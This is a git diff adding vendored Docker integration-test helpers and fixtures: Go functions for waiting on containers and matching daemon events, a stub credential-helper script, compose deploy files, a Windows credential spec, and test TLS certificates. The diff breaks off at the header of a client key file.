+	for i := 0; i != 50; i++ {
+		if err = reg.Ping(); err == nil {
+			break
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+
+	c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for test registry to become available: %v", err))
+	return reg
+}
+
+func setupNotary(c *check.C) *testNotary {
+	ts, err := newTestNotary(c)
+	c.Assert(err, check.IsNil)
+
+	return ts
+}
+
+// appendBaseEnv appends the minimum set of environment variables to exec the
+// docker cli binary for testing with correct configuration to the given env
+// list.
+func appendBaseEnv(isTLS bool, env ...string) []string {
+	preserveList := []string{
+		// preserve remote test host
+		"DOCKER_HOST",
+
+		// windows: requires preserving SystemRoot, otherwise dial tcp fails
+		// with "GetAddrInfoW: A non-recoverable error occurred during a database lookup."
+		"SystemRoot",
+
+		// testing help text requires the $PATH to dockerd is set
+		"PATH",
+	}
+	if isTLS {
+		preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH")
+	}
+
+	for _, key := range preserveList {
+		if val := os.Getenv(key); val != "" {
+			env = append(env, fmt.Sprintf("%s=%s", key, val))
+		}
+	}
+	return env
+}
+
+func createTmpFile(c *check.C, content string) string {
+	f, err := ioutil.TempFile("", "testfile")
+	c.Assert(err, check.IsNil)
+
+	filename := f.Name()
+
+	err = ioutil.WriteFile(filename, []byte(content), 0644)
+	c.Assert(err, check.IsNil)
+
+	return filename
+}
+
+func buildImageWithOutInDamon(socket string, name, dockerfile string, useCache bool) (string, error) {
+	args := []string{"--host", socket}
+	buildCmd := buildImageCmdArgs(args, name, dockerfile, useCache)
+	out, exitCode, err := runCommandWithOutput(buildCmd)
+	if err != nil || exitCode != 0 {
+		return out, fmt.Errorf("failed to build the image: %s, error: %v", out, err)
+	}
+	return out, nil
+}
+
+func buildImageCmdArgs(args []string, name, dockerfile string, useCache bool) *exec.Cmd {
+	args = append(args, []string{"-D", "build", "-t", name}...)
+	if !useCache {
+		args = append(args, "--no-cache")
+	}
+	args = append(args, "-")
+	buildCmd := exec.Command(dockerBinary, args...)
+	buildCmd.Stdin = strings.NewReader(dockerfile)
+	return buildCmd
+
+}
+
+func waitForContainer(contID string, args ...string) error {
+	args = append([]string{dockerBinary, "run", "--name", contID}, args...)
+	result := icmd.RunCmd(icmd.Cmd{Command: args})
+	if result.Error != nil {
+		return result.Error
+	}
+	return waitRun(contID)
+}
+
+// waitRestart will wait for the specified container to restart once
+func waitRestart(contID string, duration time.Duration) error {
+	return waitInspect(contID, "{{.RestartCount}}", "1", duration)
+}
+
+// waitRun will wait for the specified container to be running, maximum 5 seconds.
+func waitRun(contID string) error {
+	return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second)
+}
+
+// waitExited will wait for the specified container to state exit, subject
+// to a maximum time limit in seconds supplied by the caller
+func waitExited(contID string, duration time.Duration) error {
+	return waitInspect(contID, "{{.State.Status}}", "exited", duration)
+}
+
+// waitInspect will wait for the specified container to have the specified string
+// in the inspect output. It will wait until the specified timeout (in seconds)
+// is reached.
+func waitInspect(name, expr, expected string, timeout time.Duration) error {
+	return waitInspectWithArgs(name, expr, expected, timeout)
+}
+
+func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error {
+	after := time.After(timeout)
+
+	args := append(arg, "inspect", "-f", expr, name)
+	for {
+		result := icmd.RunCommand(dockerBinary, args...)
+		if result.Error != nil {
+			if !strings.Contains(result.Stderr(), "No such") {
+				return fmt.Errorf("error executing docker inspect: %v\n%s",
+					result.Stderr(), result.Stdout())
+			}
+			select {
+			case <-after:
+				return result.Error
+			default:
+				time.Sleep(10 * time.Millisecond)
+				continue
+			}
+		}
+
+		out := strings.TrimSpace(result.Stdout())
+		if out == expected {
+			break
+		}
+
+		select {
+		case <-after:
+			return fmt.Errorf("condition \"%q == %q\" not true in time", out, expected)
+		default:
+		}
+
+		time.Sleep(100 * time.Millisecond)
+	}
+	return nil
+}
+
+func getInspectBody(c *check.C, version, id string) []byte {
+	endpoint := fmt.Sprintf("/%s/containers/%s/json", version, id)
+	status, body, err := sockRequest("GET", endpoint, nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusOK)
+	return body
+}
+
+// Run a long running idle task in a background container using the
+// system-specific default image and command.
+func runSleepingContainer(c *check.C, extraArgs ...string) (string, int) {
+	return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...)
+}
+
+// Run a long running idle task in a background container using the specified
+// image and the system-specific command.
+func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) (string, int) {
+	args := []string{"run", "-d"}
+	args = append(args, extraArgs...)
+	args = append(args, image)
+	args = append(args, sleepCommandForDaemonPlatform()...)
+	return dockerCmd(c, args...)
+}
+
+func getRootUIDGID() (int, int, error) {
+	uidgid := strings.Split(filepath.Base(dockerBasePath), ".")
+	if len(uidgid) == 1 {
+		//user namespace remapping is not turned on; return 0
+		return 0, 0, nil
+	}
+	uid, err := strconv.Atoi(uidgid[0])
+	if err != nil {
+		return 0, 0, err
+	}
+	gid, err := strconv.Atoi(uidgid[1])
+	if err != nil {
+		return 0, 0, err
+	}
+	return uid, gid, nil
+}
+
+// minimalBaseImage returns the name of the minimal base image for the current
+// daemon platform.
+func minimalBaseImage() string {
+	if daemonPlatform == "windows" {
+		return WindowsBaseImage
+	}
+	return "scratch"
+}
+
+func getGoroutineNumber() (int, error) {
+	i := struct {
+		NGoroutines int
+	}{}
+	status, b, err := sockRequest("GET", "/info", nil)
+	if err != nil {
+		return 0, err
+	}
+	if status != http.StatusOK {
+		return 0, fmt.Errorf("http status code: %d", status)
+	}
+	if err := json.Unmarshal(b, &i); err != nil {
+		return 0, err
+	}
+	return i.NGoroutines, nil
+}
+
+func waitForGoroutines(expected int) error {
+	t := time.After(30 * time.Second)
+	for {
+		select {
+		case <-t:
+			n, err := getGoroutineNumber()
+			if err != nil {
+				return err
+			}
+			if n > expected {
+				return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n)
+			}
+		default:
+			n, err := getGoroutineNumber()
+			if err != nil {
+				return err
+			}
+			if n <= expected {
+				return nil
+			}
+			time.Sleep(200 * time.Millisecond)
+		}
+	}
+}
+
+// getErrorMessage returns the error message from an error API response
+func getErrorMessage(c *check.C, body []byte) string {
+	var resp types.ErrorResponse
+	c.Assert(json.Unmarshal(body, &resp), check.IsNil)
+	return strings.TrimSpace(resp.Message)
+}
+
+func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) {
+	after := time.After(timeout)
+	for {
+		v, comment := f(c)
+		assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params)
+		select {
+		case <-after:
+			assert = true
+		default:
+		}
+		if assert {
+			if comment != nil {
+				args = append(args, comment)
+			}
+			c.Assert(v, checker, args...)
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+}
+
+type checkF func(*check.C) (interface{}, check.CommentInterface)
+type reducer func(...interface{}) interface{}
+
+func reducedCheck(r reducer, funcs ...checkF) checkF {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		var values []interface{}
+		var comments []string
+		for _, f := range funcs {
+			v, comment := f(c)
+			values = append(values, v)
+			if comment != nil {
+				comments = append(comments, comment.CheckCommentString())
+			}
+		}
+		return r(values...), check.Commentf("%v", strings.Join(comments, ", "))
+	}
+}
+
+func sumAsIntegers(vals ...interface{}) interface{} {
+	var s int
+	for _, v := range vals {
+		s += v.(int)
+	}
+	return s
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/events_utils.go b/vendor/github.com/docker/docker/integration-cli/events_utils.go
new file mode 100644
index 0000000000..ba241796b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/events_utils.go
@@ -0,0 +1,206 @@
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"io"
+	"os/exec"
+	"regexp"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	eventstestutils "github.com/docker/docker/daemon/events/testutils"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// eventMatcher is a function that tries to match an event input.
+// It returns true if the event matches and a map with
+// a set of key/value to identify the match.
+type eventMatcher func(text string) (map[string]string, bool)
+
+// eventMatchProcessor is a function to handle an event match.
+// It receives a map of key/value with the information extracted in a match.
+type eventMatchProcessor func(matches map[string]string)
+
+// eventObserver runs an events commands and observes its output.
+type eventObserver struct {
+	buffer             *bytes.Buffer
+	command            *exec.Cmd
+	scanner            *bufio.Scanner
+	startTime          string
+	disconnectionError error
+}
+
+// newEventObserver creates the observer and initializes the command
+// without running it. Users must call `eventObserver.Start` to start the command.
+func newEventObserver(c *check.C, args ...string) (*eventObserver, error) {
+	since := daemonTime(c).Unix()
+	return newEventObserverWithBacklog(c, since, args...)
+}
+
+// newEventObserverWithBacklog creates a new observer changing the start time of the backlog to return.
+func newEventObserverWithBacklog(c *check.C, since int64, args ...string) (*eventObserver, error) {
+	startTime := strconv.FormatInt(since, 10)
+	cmdArgs := []string{"events", "--since", startTime}
+	if len(args) > 0 {
+		cmdArgs = append(cmdArgs, args...)
+	}
+	eventsCmd := exec.Command(dockerBinary, cmdArgs...)
+	stdout, err := eventsCmd.StdoutPipe()
+	if err != nil {
+		return nil, err
+	}
+
+	return &eventObserver{
+		buffer:    new(bytes.Buffer),
+		command:   eventsCmd,
+		scanner:   bufio.NewScanner(stdout),
+		startTime: startTime,
+	}, nil
+}
+
+// Start starts the events command.
+func (e *eventObserver) Start() error {
+	return e.command.Start()
+}
+
+// Stop stops the events command.
+func (e *eventObserver) Stop() {
+	e.command.Process.Kill()
+	e.command.Process.Release()
+}
+
+// Match tries to match the events output with a given matcher.
+func (e *eventObserver) Match(match eventMatcher, process eventMatchProcessor) {
+	for e.scanner.Scan() {
+		text := e.scanner.Text()
+		e.buffer.WriteString(text)
+		e.buffer.WriteString("\n")
+
+		if matches, ok := match(text); ok {
+			process(matches)
+		}
+	}
+
+	err := e.scanner.Err()
+	if err == nil {
+		err = io.EOF
+	}
+
+	logrus.Debugf("EventObserver scanner loop finished: %v", err)
+	e.disconnectionError = err
+}
+
+func (e *eventObserver) CheckEventError(c *check.C, id, event string, match eventMatcher) {
+	var foundEvent bool
+	scannerOut := e.buffer.String()
+
+	if e.disconnectionError != nil {
+		until := daemonUnixTime(c)
+		out, _ := dockerCmd(c, "events", "--since", e.startTime, "--until", until)
+		events := strings.Split(strings.TrimSpace(out), "\n")
+		for _, e := range events {
+			if _, ok := match(e); ok {
+				foundEvent = true
+				break
+			}
+		}
+		scannerOut = out
+	}
+	if !foundEvent {
+		c.Fatalf("failed to observe event `%s` for %s. Disconnection error: %v\nout:\n%v", event, id, e.disconnectionError, scannerOut)
+	}
+}
+
+// matchEventLine matches a text with the event regular expression.
+// It returns the matches and true if the regular expression matches with the given id and event type.
+// It returns an empty map and false if there is no match.
+func matchEventLine(id, eventType string, actions map[string]chan bool) eventMatcher {
+	return func(text string) (map[string]string, bool) {
+		matches := eventstestutils.ScanMap(text)
+		if len(matches) == 0 {
+			return matches, false
+		}
+
+		if matchIDAndEventType(matches, id, eventType) {
+			if _, ok := actions[matches["action"]]; ok {
+				return matches, true
+			}
+		}
+		return matches, false
+	}
+}
+
+// processEventMatch closes an action channel when an event line matches the expected action.
+func processEventMatch(actions map[string]chan bool) eventMatchProcessor {
+	return func(matches map[string]string) {
+		if ch, ok := actions[matches["action"]]; ok {
+			ch <- true
+		}
+	}
+}
+
+// parseEventAction parses an event text and returns the action.
+// It fails if the text is not in the event format.
+func parseEventAction(c *check.C, text string) string {
+	matches := eventstestutils.ScanMap(text)
+	return matches["action"]
+}
+
+// eventActionsByIDAndType returns the actions for a given id and type.
+// It fails if the text is not in the event format.
+func eventActionsByIDAndType(c *check.C, events []string, id, eventType string) []string {
+	var filtered []string
+	for _, event := range events {
+		matches := eventstestutils.ScanMap(event)
+		c.Assert(matches, checker.Not(checker.IsNil))
+		if matchIDAndEventType(matches, id, eventType) {
+			filtered = append(filtered, matches["action"])
+		}
+	}
+	return filtered
+}
+
+// matchIDAndEventType returns true if an event matches a given id and type.
+// It also resolves names in the event attributes if the id doesn't match.
+func matchIDAndEventType(matches map[string]string, id, eventType string) bool {
+	return matchEventID(matches, id) && matches["eventType"] == eventType
+}
+
+func matchEventID(matches map[string]string, id string) bool {
+	matchID := matches["id"] == id || strings.HasPrefix(matches["id"], id)
+	if !matchID && matches["attributes"] != "" {
+		// try matching a name in the attributes
+		attributes := map[string]string{}
+		for _, a := range strings.Split(matches["attributes"], ", ") {
+			kv := strings.Split(a, "=")
+			attributes[kv[0]] = kv[1]
+		}
+		matchID = attributes["name"] == id
+	}
+	return matchID
+}
+
+func parseEvents(c *check.C, out, match string) {
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	for _, event := range events {
+		matches := eventstestutils.ScanMap(event)
+		matched, err := regexp.MatchString(match, matches["action"])
+		c.Assert(err, checker.IsNil)
+		c.Assert(matched, checker.True, check.Commentf("Matcher: %s did not match %s", match, matches["action"]))
+	}
+}
+
+func parseEventsWithID(c *check.C, out, match, id string) {
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	for _, event := range events {
+		matches := eventstestutils.ScanMap(event)
+		c.Assert(matchEventID(matches, id), checker.True)
+
+		matched, err := regexp.MatchString(match, matches["action"])
+		c.Assert(err, checker.IsNil)
+		c.Assert(matched, checker.True, check.Commentf("Matcher: %s did not match %s", match, matches["action"]))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures.go b/vendor/github.com/docker/docker/integration-cli/fixtures.go
new file mode 100644
index 0000000000..e99b738158
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures.go
@@ -0,0 +1,69 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"sync"
+)
+
+var ensureHTTPServerOnce sync.Once
+
+func ensureHTTPServerImage() error {
+	var doIt bool
+	ensureHTTPServerOnce.Do(func() {
+		doIt = true
+	})
+
+	if !doIt {
+		return nil
+	}
+
+	protectedImages["httpserver:latest"] = struct{}{}
+
+	tmp, err := ioutil.TempDir("", "docker-http-server-test")
+	if err != nil {
+		return fmt.Errorf("could not build http server: %v", err)
+	}
+	defer os.RemoveAll(tmp)
+
+	goos := daemonPlatform
+	if goos == "" {
+		goos = "linux"
+	}
+	goarch := os.Getenv("DOCKER_ENGINE_GOARCH")
+	if goarch == "" {
+		goarch = "amd64"
+	}
+
+	goCmd, lookErr := exec.LookPath("go")
+	if lookErr != nil {
+		return fmt.Errorf("could not build http server: %v", lookErr)
+	}
+
+	cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver")
+	cmd.Env = append(os.Environ(), []string{
+		"CGO_ENABLED=0",
+		"GOOS=" + goos,
+		"GOARCH=" + goarch,
+	}...)
+	var out []byte
+	if out, err = cmd.CombinedOutput(); err != nil {
+		return fmt.Errorf("could not build http server: %s", string(out))
+	}
+
+	cpCmd, lookErr := exec.LookPath("cp")
+	if lookErr != nil {
+		return fmt.Errorf("could not build http server: %v", lookErr)
+	}
+	if out, err = exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil {
+		return fmt.Errorf("could not build http server: %v", string(out))
+	}
+
+	if out, err = exec.Command(dockerBinary, "build", "-q", "-t", "httpserver", tmp).CombinedOutput(); err != nil {
+		return fmt.Errorf("could not build http server: %v", string(out))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test
new file mode 100755
index 0000000000..a7be56b2f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test
@@ -0,0 +1,55 @@
+#!/bin/bash
+
+set -e
+
+listFile=shell_test_list.json
+
+case $1 in
+	"store")
+		in=$(</dev/stdin)
+		server=$(echo "$in" | jq --raw-output ".ServerURL")
+		serverHash=$(echo "$server" | sha1sum - | awk '{print $1}')
+
+		username=$(echo "$in" | jq --raw-output ".Username")
+		password=$(echo "$in" | jq --raw-output ".Secret")
+		echo "{ \"Username\": \"${username}\", \"Secret\": \"${password}\" }" > $TEMP/$serverHash
+		# add the server to the list file
+		if [[ ! -f $TEMP/$listFile ]]; then
+			echo "{ \"${server}\": \"${username}\" }" > $TEMP/$listFile
+		else
+			list=$(<$TEMP/$listFile)
+			echo "$list" | jq ". + {\"${server}\": \"${username}\"}" > $TEMP/$listFile
+		fi
+		;;
+	"get")
+		in=$(</dev/stdin)
+		serverHash=$(echo "$in" | sha1sum - | awk '{print $1}')
+		if [[ ! -f $TEMP/$serverHash ]]; then
+			echo "credentials not found in native keychain"
+			exit 1
+		fi
+		payload=$(<$TEMP/$serverHash)
+		echo "$payload"
+		;;
+	"erase")
+		in=$(</dev/stdin)
+		serverHash=$(echo "$in" | sha1sum - | awk '{print $1}')
+		rm -f $TEMP/$serverHash
+
+		# Remove the server from the list
+		list=$(<$TEMP/$listFile)
+		echo "$list" | jq "del(.[\"${in}\"])" > $TEMP/$listFile
+		;;
+	"list")
+		if [[ ! -f $TEMP/$listFile ]]; then
+			echo "{}"
+		else
+			payload=$(<$TEMP/$listFile)
+			echo "$payload"
+		fi
+		;;
+	*)
+		echo "unknown credential option"
+		exit 1
+		;;
+esac
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json b/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json
new file mode 100644
index 0000000000..28913e49de
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json
@@ -0,0 +1,25 @@
+{
+    "CmsPlugins":  [
+                       "ActiveDirectory"
+                   ],
+    "DomainJoinConfig":  {
+                             "Sid":  "S-1-5-21-4288985-3632099173-1864715694",
+                             "MachineAccountName":  "MusicStoreAcct",
+                             "Guid":  "3705d4c3-0b80-42a9-ad97-ebc1801c74b9",
+                             "DnsTreeName":  "hyperv.local",
+                             "DnsName":  "hyperv.local",
+                             "NetBiosName":  "hyperv"
+                         },
+    "ActiveDirectoryConfig":  {
+                                  "GroupManagedServiceAccounts":  [
+                                                                      {
+                                                                          "Name":  "MusicStoreAcct",
+                                                                          "Scope":  "hyperv.local"
+                                                                      },
+                                                                      {
+                                                                          "Name":  "MusicStoreAcct",
+                                                                          "Scope":  "hyperv"
+                                                                      }
+                                                                  ]
+                              }
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml
new file mode 100644
index 0000000000..f30c04f8f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml
@@ -0,0 +1,9 @@
+
+version: "3"
+services:
+  web:
+    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
+    command: top
+  db:
+    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
+    command: "tail -f /dev/null"
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml
new file mode 100644
index 0000000000..4ec8cacc9b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml
@@ -0,0 +1,11 @@
+
+version: "3.1"
+services:
+  web:
+    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
+    command: top
+    secrets:
+      - special
+secrets:
+  special:
+    file: fixtures/secrets/default
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml
new file mode 100644
index 0000000000..6ac92cddee
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml
@@ -0,0 +1,20 @@
+
+version: "3.1"
+services:
+  web:
+    image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0
+    command: top
+    secrets:
+      - special
+      - source: super
+        target: foo.txt
+        mode: 0400
+      - star
+secrets:
+  special:
+    file: fixtures/secrets/default
+  super:
+    file: fixtures/secrets/default
+  star:
+    external:
+      name: outside
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
new file mode 100644
index 0000000000..6825d6d1bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD
+VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG
+A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI
+Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls
+QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx
+CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv
+MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD
+VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW
+EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn
+0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp
+AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5
+sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV
+HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09
+q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
+QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x
+ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI
+Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq
+hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi
+zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE
+ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt
+Zxtf5lL6KSO9Y+EFwM+rju6hm5hW
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
new file mode 100644
index 0000000000..c05ed47c2c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem
@@ -0,0 +1,73 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 3 (0x3)
+    Signature Algorithm: sha1WithRSAEncryption
+        Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
+        Validity
+            Not Before: Dec  4 14:17:54 2013 GMT
+            Not After : Dec  2 14:17:54 2023 GMT
+        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+                Public-Key: (1024 bit)
+                Modulus:
+                    00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8:
+                    34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc:
+                    f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea:
+                    b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70:
+                    81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25:
+                    6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c:
+                    aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa:
+                    65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0:
+                    7e:4e:78:7d:0a:9e:8f:42:43
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Comment: 
+                Easy-RSA Generated Certificate
+            X509v3 Subject Key Identifier: 
+                DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81
+            X509v3 Authority Key Identifier: 
+                keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB
+                DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
+                serial:FD:AB:EC:6A:84:27:04:A7
+
+            X509v3 Extended Key Usage: 
+                TLS Web Client Authentication
+            X509v3 Key Usage: 
+                Digital Signature
+    Signature Algorithm: sha1WithRSAEncryption
+         1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40:
+         12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa:
+         1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4:
+         af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab:
+         84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31:
+         f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f:
+         56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e:
+         4a:c4
+-----BEGIN CERTIFICATE-----
+MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx
+CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv
+cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l
+MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv
+bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG
+EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE
+ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp
+ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0
+LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0
+peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB
+Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73
+cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ
+YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV
+HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09
+q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
+QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x
+ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI
+Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq
+hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN
+AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+
+kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1
+aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem
